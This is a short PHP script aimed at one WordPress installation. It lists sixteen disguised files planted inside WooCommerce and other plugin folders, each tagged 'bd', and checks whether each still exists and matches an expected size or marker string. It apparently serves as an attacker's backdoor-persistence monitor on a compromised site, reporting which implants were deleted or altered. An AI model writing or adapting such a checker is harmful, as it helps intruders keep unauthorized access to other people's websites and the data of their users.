<?php $r = '/home/nerdvcgo/wordpress-demo.virtualtry.shop'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php"=>"bd@@93043@@approve_request",
"/wp-content/plugins/woocommerce/vendor/sabberworm/php-css-parser/src/Position/uninstall.k2.php"=>"bd@@96309@@621",
"/wp-content/plugins/social-1759931203/4O4.php"=>"bd@@87863@@661",
"/wp-content/plugins/woocommerce/assets/client/admin/email-editor/Object.php"=>"bd@@106313@@699",
"/wp-content/plugins/woocommerce/src/Admin/API/Reports/PerformanceIndicators/EmployerView.php"=>"bd@@105332@@2051",
"/wp-content/plugins/woocommerce/src/Blocks/BlockTypes/AddToCartWithOptions/layout.css.php"=>"bd@@97663@@582",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/generic/subsection/modform.inc.php"=>"bd@@103577@@1474",
"/wp-content/plugins/woocommerce/src/Admin/API/Reports/Products/shipping.php"=>"bd@@105128@@2424",
"/wp-content/plugins/smart-image-resize/src/vendor/intervention/image/src/Intervention/Image/Commands/templates.php"=>"bd@@102393@@621",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-summary-field/helveticai.php"=>"bd@@112876@@566",
"/wp-content/plugins/woocommerce/packages/email-editor/src/Engine/Renderer/ContentRenderer/Layout/array_key_exists.php"=>"bd@@113391@@2061",
"/wp-content/plugins/smart-image-resize/src/vendor/symfony/polyfill-mbstring/Resources/unidata/modifier.repeat.php"=>"bd@@113577@@700",
"/wp-content/plugins/woocommerce/src/Admin/API/Reports/Revenue/Stats/timeschedule.php"=>"bd@@113726@@1663",
"/wp-content/plugins/woocommerce/assets/client/admin/currency/mods_temp.php"=>"bd@@97313@@606",
"/wp-content/plugins/woocommerce/vendor/opis/json-schema/src/Formats/view.author.php"=>"bd@@113901@@1416",
"/wp-content/plugins/woocommerce/src/Admin/Features/ProductBlockEditor/xml_domit_doctor.php"=>"bd@@98220@@2184"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');